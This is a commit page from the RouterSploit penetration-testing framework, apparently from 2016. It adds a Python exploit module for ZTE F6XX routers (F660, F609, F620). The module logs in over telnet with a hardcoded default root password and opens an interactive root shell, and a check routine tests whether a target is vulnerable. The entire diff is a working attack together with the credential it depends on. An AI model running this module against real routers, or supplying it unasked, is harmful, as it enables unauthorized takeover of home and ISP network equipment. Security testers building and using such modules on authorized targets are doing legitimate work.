Add exploits ZTE F6XX Default root password

5454bf94 · devilscream · 09a1492c · 5454bf94
Commit 5454bf94 authored May 02, 2016 by devilscream
Hide whitespace changes
Inline Side-by-side

Showing with 83 additions and 0 deletions

f6xx_default_root.py routersploit/modules/exploits/zte/f6xx_default_root.py +83 -0

No files found.
--- a/routersploit/modules/exploits/zte/f6xx_default_root.py
+++ b/routersploit/modules/exploits/zte/f6xx_default_root.py
+import telnetlib
+
+from routersploit import (
+    exploits,
+    print_success,
+    print_error,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for ZTE F6XX default root password.
+    If the target is vulnerable it is possible to authenticate to the device"
+    """
+    __info__ = {
+        'name': 'ZTE F6XX Default root',
+        'description': 'Module exploits ZTE F6XX default root password. If the target is is possible to authentiate to the device.',
+        'authors': [
+            'devilscream',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            '',
+        ],
+        'devices': [
+            'ZTE ZXA10 F660',
+            'ZTE ZXA10 F609',
+            'ZTE ZXA10 F620'
+        ]
+    }
+
+    target = exploits.Option('', 'Target address e.g. 192.168.1.1')  # target address
+
+    username = "root"
+    password = "Zte521"
+
+    def run(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write("\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+
+            if i != -1:
+                return False
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    print_success("Telnet - Successful authentication")
+                    tn.interact()
+
+            tn.close()
+        except:
+            print_error("Connection Error")
+            return
+
+    def check(self):
+        try:
+            tn = telnetlib.Telnet(self.target, 23)
+            tn.expect(["Login: ", "login: "], 5)
+            tn.write(self.username + "\r\n")
+            tn.expect(["Password: ", "password"], 5)
+            tn.write(self.password + "\r\n")
+            tn.write("\r\n")
+
+            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
+            tn.close()
+
+            if i != -1:
+                return False
+            else:
+                if any(map(lambda x: x in res, ["#", "$", ">"])):
+                    tn.close()
+                    return True
+            tn.close()
+        except:
+            return False
+
+        return False
\ No newline at end of file